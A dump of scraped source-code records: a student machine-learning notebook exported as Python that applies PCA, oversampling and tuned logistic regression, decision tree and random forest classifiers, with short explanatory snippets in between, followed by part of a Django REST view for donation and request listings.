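from sklearn.decomposition import PCA

rng = np.random.RandomState(42)
X_demo = rng.randn(200, 20) @ rng.randn(20, 20)   # correlated features

pca_95 = PCA(0.95).fit(X_demo)   # float => n_components chosen automatically
print(pca_95.n_components_)
print(np.cumsum(pca_95.explained_variance_ratio_)[-1])  # cumulative variance kept, >= 0.95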
In[167]:\n\n\nscaler = StandardScaler()\n\n\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[168]:\n\n\nX_train_pca_std = pca_again.fit_transform(X_train)\n\n\n# In[169]:\n\n\nX_train_pca_std.shape\n\n\n# In[170]:\n\n\n# Tranforming X_Test\nX_test_pca_std = pca_again.transform(X_test)\nX_test_pca_std.shape\n\n\n# In[171]:\n\n\n#Doing the PCA on the train data\npca.fit(X_train)\n\n\n# In[172]:\n\n\n#Making the screeplot - plotting the cumulative variance against the number of components\nget_ipython().run_line_magic('matplotlib', 'inline')\nfig = plt.figure(figsize = (12,8))\nplt.vlines(x = X_train_pca_std.shape[1],ymax = 1,ymin = 0,colors = 'r',linestyles = '--')\nplt.hlines(y = 0.95, xmax = 70,xmin = 0,colors = 'g',linestyles = '--')\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.xlabel('number of components')\nplt.ylabel('cumulative explained variance')\n\nsns.despine()\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# In[173]:\n\n\npca = PCA(n_components=5)\n\n\n# In[174]:\n\n\nscaler = StandardScaler()\n\n\n# In[175]:\n\n\nscaled_df=df_winow2.copy()\nscaled_df=pd.DataFrame(scaler.fit_transform(scaled_df), columns=scaled_df.columns)\npca_fit = pca.fit(scaled_df)\n\n\n# In[ ]:\n\n\n\n\n\n# In[176]:\n\n\nfig = plt.figure(figsize=(14,5))\nPC_values = np.arange(pca_fit.n_components_) + 1\n\nplt.plot(PC_values, pca_fit.explained_variance_ratio_, 'o-', linewidth=2, color='blue')\nplt.title('Scree Plot')\nplt.xlabel('Principal Component')\nplt.ylabel('Variance Explained')\n\nplt.show()\n\n\n# In[177]:\n\n\nprint(pca_fit.explained_variance_ratio_)\n\n\n# In[ ]:\n\n\n\n\n\n# # Data Preparation for Modelling\n\n# In[178]:\n\n\nX = df_winow2.drop('Class', axis = 1)\ny = df_winow2[['Class']]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 100, stratify=y)\n\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\n\n# In[179]:\n\n\n# Normalize the data \n\nscaler = MinMaxScaler()\n\nscaled_data = scaler.fit_transform(X_train)\n\nX_train = pd.DataFrame(data = scaled_data, index = X_train.index, columns = X_train.columns)\nX_test = pd.DataFrame(data = scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n\n\n# In[ ]:\n\n\n\n\n\n# In[180]:\n\n\nprint(\"Before OverSampling, counts of label '1': {}\".format((y_train==1).sum()[0]))\nprint(\"Before OverSampling, counts of label '0': {} \\n\".format((y_train==0).sum()[0]))\n\ny_train_1 = (y_train==1).sum()[0]\nprint(\"Before OverSampling, churn event rate : {}% \\n\".format(round(y_train_1/len(y_train)*100,2)))\n\n\n# In[181]:\n\n\nsm_smot = smot(random_state=27, sampling_strategy=1)\nX_train_res, y_train_res = sm_smot.fit_resample(X_train, y_train)\nX_train_res = X_train\ny_train_res = y_train\n\n\n# # Defining functions for Modelling\n\n# In[182]:\n\n\n# Defining the function to plot the ROC Curve\n\ndef draw_roc (actual, probs):\n fpr, tpr, thresholds = metrics.roc_curve(actual, probs, drop_intermediate = False)\n \n auc_score = metrics.roc_auc_score(actual, probs)\n plt.figure(figsize=(7,5))\n plt.plot(fpr, tpr, label=\"ROC curve (area = %0.2f)\"%auc_score)\n \n plt.plot([0,1],[0,1],'k--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel(\"False Positive Rate or [1 - True Negative Rate]\")\n plt.ylabel(\"True Positive Rate\")\n plt.title(\"Receiver operating charactersitc example\")\n plt.legend(loc=\"lower right\")\n sns.despine()\n plt.tight_layout()\n plt.show()\n \n return fpr, tpr, 
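One thing to watch in the oversampling cell above: the two assignments right after fit_resample overwrite X_train_res/y_train_res with the originals, so the resampled data is effectively discarded and training proceeds on the unbalanced split. If balanced data is wanted, those two overwrite lines should simply be removed. For reference, what the oversampler produces looks like this (smot in the script is an alias for RandomOverSampler; the toy data and names below are illustrative):

from collections import Counter
from imblearn.over_sampling import RandomOverSampler
from sklearn.datasets import make_classification

X_demo, y_demo = make_classification(n_samples=1000, weights=[0.8, 0.2],
                                     random_state=27)
ros = RandomOverSampler(random_state=27, sampling_strategy=1)  # 1 => 1:1 classes
X_res, y_res = ros.fit_resample(X_demo, y_demo)
print(Counter(y_demo))   # imbalanced, roughly {0: 800, 1: 200}
print(Counter(y_res))    # balanced after resampling, {0: 800, 1: 800}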
thresholds\n\n\n# In[183]:\n\n\nmetricsdataframe=pd.DataFrame(columns=['Model',\n 'Train/Test',\n 'Roc_auc_score',\n 'Sensitivity',\n 'Specificity',\n 'FPR',\n 'Positive predictive value',\n 'Negative Predictive value',\n 'Precision',\n 'Accuracy',\n 'F1-Score'])\n\n\n# In[184]:\n\n\n# Defining function to get the evaluation metrics of the models.\ndef getModelMetrics(actual_Class=False,pred_Class=False,model_name='',train_or_test=''):\n\n confusion = metrics.confusion_matrix(actual_Class, pred_Class)\n\n TP = confusion[1,1] # true positive \n TN = confusion[0,0] # true negatives\n FP = confusion[0,1] # false positives\n FN = confusion[1,0] # false negatives\n \n\n \n Roc_auc_score=round(metrics.roc_auc_score(actual_Class,pred_Class),2)\n # Let's see the sensitivity of our logistic regression model\n Sensitivity=round((TP / float(TP+FN)),2)\n # Let us calculate specificity\n Specificity=round((TN / float(TN+FP)),2)\n # Calculate false postive rate - predicting profit when customer does not have profitted\n FPR=round((FP/ float(TN+FP)),2)\n # positive predictive value \n PositivePredictiveValue=round((TP / float(TP+FP)),2)\n # Negative predictive value\n NegativePredictiveValue=round((TN / float(TN+ FN)),2)\n # sklearn precision score value \n Precision=round(metrics.precision_score(actual_Class, pred_Class ),2)\n # Accuracy\n Accuracy = round(metrics.accuracy_score(actual_Class, pred_Class), 2)\n # F-1 Score\n F1_Score = round(metrics.f1_score(actual_Class, pred_Class), 2)\n \n \n print(\"Roc_auc_score : {}\".format(metrics.roc_auc_score(actual_Class,pred_Class)))\n # Let's see the sensitivity of our logistic regression model\n print('Sensitivity/Recall : {}'.format(TP / float(TP+FN)))\n # Let us calculate specificity\n print('Specificity: {}'.format(TN / float(TN+FP)))\n # Calculate false postive rate - predicting profit when customer does not have profitted\n print('False Positive Rate: {}'.format(FP/ float(TN+FP)))\n # positive predictive value \n print('Positive predictive value: {}'.format(TP / float(TP+FP)))\n # Negative predictive value\n print('Negative Predictive value: {}'.format(TN / float(TN+ FN)))\n # sklearn precision score value \n print('Precision: {}'.format(metrics.precision_score(actual_Class, pred_Class )))\n # sklearn precision score value \n print('Accuracy: {}'.format(metrics.accuracy_score(actual_Class, pred_Class )))\n #F1 Score\n print(\"F1 Score: {}\".format(metrics.f1_score(actual_Class, pred_Class )))\n \n# data_list=[model_name,train_or_test,Roc_auc_score,Sensitivity,Specificity,NegativePredictiveValue,Precision, ]\n data_list=[model_name,train_or_test,Roc_auc_score,Sensitivity,Specificity,FPR,PositivePredictiveValue,NegativePredictiveValue,Precision, Accuracy, F1_Score]\n series_metrics=pd.Series(data_list,index=metricsdataframe.columns)\n \n return series_metrics\n \n\n\n# In[185]:\n\n\n# Defining function to write the evaluation metrics of the models into data frame.\ndef WriteModelMetrics(series_metrics,metricsdataframe):\n metricsdataframe = metricsdataframe.append(series_metrics,ignore_index=True)\n return metricsdataframe\n\n\n# In[186]:\n\n\n# Function to find the optimal cutoff for classifing as Profit/non-profit\ndef findOptimalCutoff(df):\n \n # Let's create columns with different probability cutoffs \n numbers = [float(x)/10 for x in range(10)]\n for i in numbers:\n df[i] = df.Class_Prob.map( lambda x: 1 if x > i else 0)\n \n \n # Now let's calculate accuracy sensitivity and specificity for various probability cutoffs.\n cutoff_df = pd.DataFrame( 
columns = ['prob','accuracy','sensi','speci'])\n from sklearn.metrics import confusion_matrix\n \n num = [0.0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n\n for i in num:\n cm1 = metrics.confusion_matrix(df.Class, df[i] )\n total1=sum(sum(cm1))\n accuracy = (cm1[0,0]+cm1[1,1])/total1\n \n speci = cm1[0,0]/(cm1[0,0]+cm1[0,1])\n sensi = cm1[1,1]/(cm1[1,0]+cm1[1,1])\n cutoff_df.loc[i] =[ i ,accuracy,sensi,speci]\n print(cutoff_df)\n \n # Let's plot accuracy sensitivity and specificity for various probabilities.\n cutoff_df.plot.line(x='prob', y=['accuracy','sensi','speci'])\n plt.figure(figsize=(7,5))\n plt.tight_layout()\n sns.despine()\n plt.show()\n\n\n# In[187]:\n\n\n# Calculating VIF \nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n# Defining a function to give VIF value \ndef vif_cal(X): \n vif = pd.DataFrame() \n vif['Features'] = X.columns\n vif['VIF'] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])] \n vif['VIF'] = round(vif['VIF'], 2)\n vif = vif.sort_values(by=\"VIF\", ascending=False)\n return vif\n\n\n# In[188]:\n\n\n# This method will result in the calculation of predicted value of the Class column.\ndef predictClassWithProb(model,X,y,prob,model_name='',train_or_test=''):\n \n # predict\n pred_probs = model.predict_proba(X)[:,1]\n \n y_df= pd.DataFrame({'Class':y.Class, 'Class_Prob':pred_probs})\n # Creating new column 'predicted' with 1 if Class_Prob>0.5 else 0\n y_df['final_predicted'] = y_df.Class_Prob.map( lambda x: 1 if x > prob else 0)\n # Let's see the head\n series_metrics=getModelMetrics(y_df.Class,y_df.final_predicted,model_name,train_or_test)\n return y_df,series_metrics\n\n\n# In[189]:\n\n\n# This method will perform cross-validation and the display the model report.\ndef modelfit(alg, X_train, y_train, performCV=True, cv_folds=my_cv):\n #Fit the algorithm on the data\n alg.fit(X_train, y_train)\n \n #Predict training set:\n dtrain_predictions = alg.predict(X_train)\n dtrain_predprob = alg.predict_proba(X_train)[:,1]\n \n #Perform cross-validation:\n if performCV:\n cv_score = cross_val_score(alg, X_train, y_train, cv=cv_folds, scoring='accuracy')\n \n #Print model report:\n print (\"\\nModel Report\")\n print (\"Accuracy : %.3g\" % metrics.roc_auc_score(y_train, dtrain_predictions))\n print (\"Recall/Sensitivity : %.3g\" % metrics.recall_score(y_train, dtrain_predictions))\n print (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_train, dtrain_predprob))\n \n if performCV:\n print (\"CV Score : Mean - %.3g | Std - %.3g | Min - %.3g | Max - %.3g\" % (np.mean(cv_score),np.std(cv_score),np.min(cv_score),np.max(cv_score)))\n \n\n\n# In[190]:\n\n\n# This method will plot accuracy of the model with the given param of model.\ndef plot_traintestAcc(score,param):\n scores = score\n # plotting accuracies with max_depth\n plt.figure()\n plt.plot(scores[\"param_\"+param], \n scores[\"mean_train_score\"], \n label=\"training accuracy\")\n plt.plot(scores[\"param_\"+param], \n scores[\"mean_test_score\"], \n label=\"test accuracy\")\n plt.xlabel(param)\n plt.ylabel(\"accuracy\")\n plt.legend()\n plt.show()\n\n\n# In[191]:\n\n\n# This method will plot accuracy of the random forest model.\ndef random_forst_feature_graph(grid_search, param):\n scores = grid_search.cv_results_\n plt.figure(figsize=(8,8))\n \n param = \"param_\"+param\n plt.plot(scores[param], \n scores[\"mean_train_score\"], \n label=\"Training accuracy\")\n\n plt.plot(scores[param], \n scores[\"mean_test_score\"], \n label=\"Test accuracy\")\n\n plt.xlabel(param)\n 
plt.ylabel(\"F1\")\n plt.legend()\n\n plt.tight_layout()\n sns.despine()\n plt.show()\n\n\n# # Modelling\n\n# In[192]:\n\n\nX_train = X_train_pca_mm\nX_test = X_test_pca_mm\n\n\n# In[193]:\n\n\nX_train_pca = X_train\ny_train_res = y_train\nX_test_pca = X_test\n# y_test = y_test\n\ny_train_res=y_train_res.values.reshape(-1,1)\n# y_test = y_test.values.reshape(-1,1)\n\n\n# In[194]:\n\n\nX_train_pca.shape\n\n\n# In[195]:\n\n\ny_train_res.shape\n\n\n# In[196]:\n\n\nX_test_pca.shape\n\n\n# In[197]:\n\n\ny_test.shape\n\n\n# In[198]:\n\n\ny_train_res = pd.DataFrame(y_train_res)\n\n\n# In[199]:\n\n\ny_train_res.rename(columns={0:\"Class\"}, inplace=True)\n\n\n# In[200]:\n\n\ny_train_res\n\n\n# In[201]:\n\n\ny_test \n\n\n# # 1. Logistic Regression\n\n# In[202]:\n\n\n# Creating Train-Test variables for Logistic Regression\nX_train_lr = pd.DataFrame(X_train_pca)\ny_train_lr = pd.DataFrame(y_train_res)\nX_test_lr = pd.DataFrame(X_test_pca)\ny_test_lr = y_test\n\n\n# In[203]:\n\n\nlogml = sm.GLM(y_train_lr, (sm.add_constant(X_train_lr)), family = sm.families.Binomial())\nlogml.fit().summary()\n\n\n# In[204]:\n\n\n# Checking for the VIF of the train data.\nvif = vif_cal(X_train_lr) \nvif\n\n\n# ### Observation\n# - There are no Columns which are highly correlated ---> VIF = 1\n# - There are not many columns whose coefficients are not statistically significant ----> p>0.05\n\n# In[205]:\n\n\nlg = LogisticRegression()\n\n\n# In[206]:\n\n\nmodelfit(lg, X_train_lr, y_train_lr)\n\n\n# In[207]:\n\n\n# predictions on Test data\npred_probs_test = lg.predict(X_test_lr)\ngetModelMetrics(y_test_lr,pred_probs_test)\n\n\n# In[208]:\n\n\nprint(\"Accuracy : {}\".format(metrics.accuracy_score(y_test_lr,pred_probs_test)))\nprint(\"Recall : {}\".format(metrics.recall_score(y_test_lr,pred_probs_test)))\nprint(\"Precision : {}\".format(metrics.precision_score(y_test_lr,pred_probs_test)))\n\n\n# In[209]:\n\n\nprint(metrics.confusion_matrix(y_test_lr,pred_probs_test))\n\n\n# In[210]:\n\n\n#Making prediction on the test data\npred_probs_train = lg.predict_proba(X_train_lr)[:,1]\n\nprint(\"roc_auc_score(Train) {:2.2}\".format(metrics.roc_auc_score(y_train_lr, pred_probs_train)))\n\n\n# In[211]:\n\n\ny_train_lr.rename(columns={0:\"Class\"}, inplace=True)\n\ncut_off_prob=0.5\ny_train_df,series_metrics = predictClassWithProb(lg,X_train_lr,y_train_lr,cut_off_prob)\n\n\n# In[212]:\n\n\ndraw_roc(y_train_df.Class, y_train_df.final_predicted)\nprint(\"roc_auc_score : {:2.2f}\".format(metrics.roc_auc_score(y_train_df.Class, y_train_df.final_predicted)))\n\n\n# In[213]:\n\n\n#draw_roc(y_pred_final.Churn, y_pred_final.predicted)\nprint(\"roc_auc_score : {:2.2f}\".format(metrics.roc_auc_score(y_train_df.Class, y_train_df.final_predicted)))\n\n\n# In[214]:\n\n\n# finding cut-off with the right balance of the metrices\n# sensitivity vs specificity trade-off\nfindOptimalCutoff(y_train_df)\n\n\n# In[215]:\n\n\n# predicting with the choosen cut-off on TRAIN\ncut_off_prob = 0.5\ny_train_df,series_metrics = predictClassWithProb(lg,X_train_lr,y_train_lr,cut_off_prob,model_name='Logistic Regression',train_or_test='TRAIN')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# In[216]:\n\n\n### predicting with the choosen cut-off on TEST\ncut_off_prob=0.5\ny_train_df,series_metrics = predictClassWithProb(lg,X_test_lr,y_test_lr,cut_off_prob,model_name='Logistic Regression',train_or_test='TEST')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# #### \n\n# ## 2. 
Decision Tree\n\n# In[217]:\n\n\n# Creating Train-Test variables for Decision Tree\nX_train_dt = pd.DataFrame(X_train_pca)\ny_train_dt = pd.DataFrame(y_train_res)\nX_test_dt = pd.DataFrame(X_test_pca)\ny_test_dt = y_test\n\n\n# In[218]:\n\n\nX_train_dt.shape\n\n\n# In[219]:\n\n\ny_train_dt.shape\n\n\n# In[220]:\n\n\nX_test_dt.shape, y_test_dt.shape\n\n\n# In[221]:\n\n\n##### Applying Decision Tree Classifier on our principal components with Hyperparameter tuning\ndt = DecisionTreeClassifier(class_weight='balanced',\n max_features='auto',\n min_samples_split=100,\n min_samples_leaf=100,\n max_depth=10,\n random_state=123)\n\nmodelfit(dt, X_train_dt, y_train_dt)\n\n\n# In[222]:\n\n\n# make predictions\npred_probs_test = dt.predict(X_test_dt)\n\n#Let's check the model metrices.\n\ngetModelMetrics(y_test_dt,pred_probs_test)\n\n\n# In[223]:\n\n\n# Create the parameter grid based on the results of random search \nparam_grid = {\n 'max_depth': [5,10,15,20,30,50],\n 'min_samples_leaf': range(100, 500, 50),\n 'min_samples_split': range(100, 500, 50),\n 'max_features': [5,10,15,20,30,50]\n}\n# Create a base model\ndt = DecisionTreeClassifier(class_weight='balanced',random_state=123)\n\n# Instantiate the grid search model\ngrid_search = GridSearchCV(estimator = dt, param_grid = param_grid, cv = my_cv, n_jobs = -1,verbose = 1000,scoring=\"f1_weighted\")\n\n\n# In[224]:\n\n\n# Fit the grid search to the data\ngrid_search.fit(X_train_dt, y_train_dt)\n\n\n# In[225]:\n\n\n# printing the optimal accuracy score and hyperparameters\nprint('We can get score of',grid_search.best_score_,'using',grid_search.best_params_)\n\n\n# In[226]:\n\n\ncv_df = pd.DataFrame(grid_search.cv_results_)\ncv_df.head(3)\n\n\n# In[227]:\n\n\ncv_df.nlargest(3,\"mean_test_score\")\n\n\n# In[228]:\n\n\ngrid_search.best_score_\n\n\n# In[229]:\n\n\ngrid_search.best_estimator_\n\n\n# In[230]:\n\n\nparam_max_depth = cv_df.nlargest(3,\"mean_test_score\").param_max_depth.iloc[0]\nparam_max_features = cv_df.nlargest(3,\"mean_test_score\").param_max_features.iloc[0]\nparam_min_samples_leaf = cv_df.nlargest(3,\"mean_test_score\").param_min_samples_leaf.iloc[0]\nparam_min_samples_split = cv_df.nlargest(3,\"mean_test_score\").param_min_samples_split.iloc[0]\n\n\n# In[231]:\n\n\n# model with the best hyperparameters\ndt_final = DecisionTreeClassifier(class_weight='balanced',\n max_depth=param_max_depth,\n max_features=param_max_features,\n min_samples_leaf=param_min_samples_leaf, \n min_samples_split=param_min_samples_split,\n random_state=123)\n\n\n# In[232]:\n\n\nmodelfit(dt_final,X_train_dt,y_train_dt)\n\n\n# In[233]:\n\n\ndraw_roc(y_train_df.Class, y_train_df.final_predicted)\nprint(\"roc_auc_score : {:2.2f}\".format(metrics.roc_auc_score(y_train_df.Class, y_train_df.final_predicted)))\n\n\n# In[234]:\n\n\n# make predictions\npred_probs_test = dt_final.predict(X_test_dt)\n#Let's check the model metrices.\ngetModelMetrics(actual_Class=y_test_dt,pred_Class=pred_probs_test)\n\n\n# In[235]:\n\n\n# predicting churn with default cut-off 0.5\ncut_off_prob = 0.5\ny_train_df,series_metrics = predictClassWithProb(dt_final,X_train_dt,y_train_dt,cut_off_prob)\n\n\n# In[236]:\n\n\n# finding cut-off with the right balance of the metrices\nfindOptimalCutoff(y_train_df)\n\n\n# In[237]:\n\n\n# predicting churn with cut-off 0.4\ncut_off_prob=0.36\ny_train_df,series_metrics = predictClassWithProb(dt_final,X_train_dt,y_train_dt,cut_off_prob,model_name='Decision 
Tree',train_or_test='TRAIN')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# In[238]:\n\n\n#Lets see how it performs on test data.\ny_test_df,series_metrics= predictClassWithProb(dt_final,X_test_dt,y_test_dt,cut_off_prob,model_name='Decision Tree',train_or_test='TEST')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# # 3. Random Forest\n\n# In[239]:\n\n\n# Creating Train-Test variables for Random Forest\nX_train_rf = pd.DataFrame(X_train_pca)\ny_train_rf = pd.DataFrame(y_train_res)\nX_test_rf = pd.DataFrame(X_test_pca)\ny_test_rf = y_test\n\n\n# In[240]:\n\n\nrf = RandomForestClassifier(random_state=42, max_depth=5, n_estimators=20, oob_score=True)\n\n\n# In[241]:\n\n\nrf.fit(X_train_rf, y_train_rf)\n\n\n# In[242]:\n\n\nrf.oob_score_\n\n\n# In[243]:\n\n\n# make predictions\npred_probs_test = rf.predict(X_test_rf)\n\n#Let's check the model metrices.\ngetModelMetrics(actual_Class=y_test_rf,pred_Class=pred_probs_test)\n\n\n# In[244]:\n\n\nparameters = {'max_depth': range(5, 40, 5)}\nrf = RandomForestClassifier()\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[245]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[246]:\n\n\n# grid_search.cv_results_\n\nplot_traintestAcc(grid_search.cv_results_,'max_depth')\n\n\n# In[247]:\n\n\nmy_max_depth = pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_max_depth'].iloc[0]\n\n\n# ### Tuning n_estimators\n\n# In[248]:\n\n\nparameters = {'n_estimators': range(5, 70, 5)}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=100, return_train_score=True)\n\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[249]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\").head()\n\n\n# In[250]:\n\n\nrandom_forst_feature_graph(grid_search, \"n_estimators\")\n\n\n# In[251]:\n\n\nmy_n_estimator = pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_n_estimators'].iloc[0]\n\n\n# ### Tuning max_features\n\n# In[252]:\n\n\nparameters = {'max_features': [5, 10, 15, 20, 25, 30,50,70]}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,n_estimators = my_n_estimator,random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[253]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[254]:\n\n\nrandom_forst_feature_graph(grid_search, \"max_features\")\n\n\n# In[255]:\n\n\nmy_max_features=pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_max_features'].iloc[0]\n\n\n# ### Tuning min_samples_leaf\n\n# In[256]:\n\n\nparameters = {'min_samples_leaf': range(1, 500, 50)}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,n_estimators = my_n_estimator, max_features = my_max_features, random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[257]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[258]:\n\n\nrandom_forst_feature_graph(grid_search, \"min_samples_leaf\")\n\n\n# In[259]:\n\n\nmy_min_sample_leaf = 
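The random-forest tuning above fixes one hyperparameter at a time, which is cheap but can miss interactions between parameters (for example, deeper trees tolerating smaller leaves). A joint randomized search over the same grids is a common alternative; a hedged sketch reusing the surrounding variables (X_train_rf, y_train_rf, my_cv):

from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV

param_dist = {
    'max_depth': list(range(5, 40, 5)),
    'n_estimators': list(range(5, 70, 5)),
    'max_features': [5, 10, 15, 20, 25, 30],
    'min_samples_leaf': list(range(1, 500, 50)),
    'min_samples_split': list(range(50, 550, 50)),
}
search = RandomizedSearchCV(RandomForestClassifier(random_state=10),
                            param_dist, n_iter=50, cv=my_cv,
                            scoring='f1_weighted', random_state=10, n_jobs=-1)
search.fit(X_train_rf, y_train_rf.values.ravel())
print(search.best_params_)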
pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_min_samples_leaf'].iloc[0]\n\n\n# ### Tuning min_samples_split\n\n# In[260]:\n\n\nparameters = {'min_samples_split': range(50, 550, 50)}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,n_estimators = my_n_estimator, max_features = my_max_features, min_samples_leaf = my_min_sample_leaf,random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[261]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[262]:\n\n\nrandom_forst_feature_graph(grid_search, \"min_samples_split\")\n\n\n# In[263]:\n\n\nmy_min_samples_split=pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_min_samples_split'].iloc[0]\n\n\n# ### Final Model\n\n# In[264]:\n\n\nrf_final = RandomForestClassifier(max_depth=my_max_depth,\n n_estimators = my_n_estimator, \n max_features = my_max_features, \n min_samples_leaf = my_min_sample_leaf,\n min_samples_split=my_min_samples_split,\n random_state=123)\n\n\n# In[265]:\n\n\nprint(\"Model performance on Train data:\")\nmodelfit(rf_final,X_train_rf,y_train_rf)\n\n\n# In[266]:\n\n\n# predict on test data\npredictions = rf_final.predict(X_test_rf)\n\n\n# In[267]:\n\n\nprint(\"Model performance on Test data:\")\ngetModelMetrics(y_test_rf,predictions)\n\n\n# In[268]:\n\n\n# predicting churn with default cut-off 0.5\ncut_off_prob=0.5\ny_train_df,series_metrics = predictClassWithProb(rf_final,X_train_rf,y_train_rf,cut_off_prob)\n\n\n# In[269]:\n\n\n# finding cut-off with the right balance of the metrices\nfindOptimalCutoff(y_train_df)\n\n\n# In[270]:\n\n\n## Training Data \ncut_off_prob=0.25\n\ny_train_df,series_metrics=predictClassWithProb(rf_final,X_train_rf,y_train_rf,cut_off_prob,model_name='Random Forest',train_or_test='TRAIN')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\ny_train_df.head()\n\n\n# In[271]:\n\n\n# Testing Data\ny_test_df,series_metrics= predictClassWithProb(rf_final,X_test_rf,y_test_rf,cut_off_prob,model_name='Random Forest',train_or_test='TEST')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# # Conclusion\n# \n# - We are getting Low Accuracy (in late 50s) and low precision (in late 50s) which is too poor to be acceptable\n\n# In[ ]:\n\n\n\n\n","repo_name":"yashmishra12/ALDA_Project","sub_path":"Python_files/Winsorize_SMOT.py","file_name":"Winsorize_SMOT.py","file_ext":"py","file_size_in_byte":44284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27885724581","text":"from datetime import datetime\nfrom django.utils import timezone\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\n\nfrom identity.models import Organization\nfrom listing.models import Donation, Request\nfrom listing.serializers import DonationSerializer, RequestSerializer\n\nclass DonationView(APIView):\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None, **kwargs):\n org_id = request.query_params.get('org_id', None)\n donation_status = request.query_params.get('status', None)\n all_donations = Donation.objects.all()\n donations_filtered = all_donations\n if org_id is not None:\n try:\n org = Organization.objects.get(id=org_id)\n except 
(Organization.DoesNotExist, ValueError):\n                return Response(\n                    {\"message\": \"Invalid org_id parameter value\"},\n                    status=status.HTTP_400_BAD_REQUEST\n                )\n            donations_filtered = all_donations.filter(organization=org)\n\n        if donation_status is not None:\n            # validate that the status is either \"active\" or \"inactive\"\n            if donation_status not in [\"active\", \"inactive\"]:\n                return Response(\n                    {\"message\": \"Invalid status parameter value\"},\n                    status=status.HTTP_400_BAD_REQUEST\n                )\n            if donation_status == \"active\":\n                donations_filtered = donations_filtered.exclude(deactivation_time__lte=datetime.now(tz=timezone.utc))\n            elif donation_status == \"inactive\":\n                donations_filtered = donations_filtered.filter(deactivation_time__lte=datetime.now(tz=timezone.utc))\n\n        # if the query set is empty\n        if not donations_filtered:\n            return Response(status=status.HTTP_204_NO_CONTENT)\n\n        serializer = DonationSerializer(donations_filtered, many=True)\n        return Response(\n            {\"donations\": serializer.data},\n            status=status.HTTP_200_OK\n        )\n    \n    def post(self, request, format=None):\n        serializer = DonationSerializer(data=request.data)\n        if serializer.is_valid():\n            created_donation = serializer.save()\n            return Response({\"donation_id\": created_donation.donation_id}, status=status.HTTP_201_CREATED)\n        errors = serializer.errors\n        key = list(errors.keys())[0]\n        return Response(\n            {\"message\": \"for key \" + key + \" \" + str(errors[key])},\n            status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, format=None):\n        donation_id = request.data.get('donation_id', None)\n        if donation_id is not None:\n            try:\n                donation = Donation.objects.get(donation_id=donation_id)\n            except (Donation.DoesNotExist, ValueError):\n                return Response(\n                    {\"message\": \"Invalid donation_id parameter value\"},\n                    status=status.HTTP_400_BAD_REQUEST\n                )\n            serializer = DonationSerializer(donation)\n            # soft_delete will be triggered in save()\n            serializer.save()\n            return Response(status=status.HTTP_200_OK)\n        return Response(\n            {\"message\": \"Invalid request\"},\n            status=status.HTTP_400_BAD_REQUEST\n        )\n\nclass RequestView(APIView):\n    permission_classes = (IsAuthenticated,)\n    def get(self, request, format=None, **kwargs):\n        org_id = request.query_params.get('org_id', None)\n        request_status = request.query_params.get('status', None)\n        all_requests = Request.objects.all()\n        requests_filtered = all_requests\n        if org_id is not None:\n            try:\n                org = Organization.objects.get(id=org_id)\n            except (Organization.DoesNotExist, ValueError):\n                return Response(\n                    {\"message\": \"Invalid org_id parameter value\"},\n                    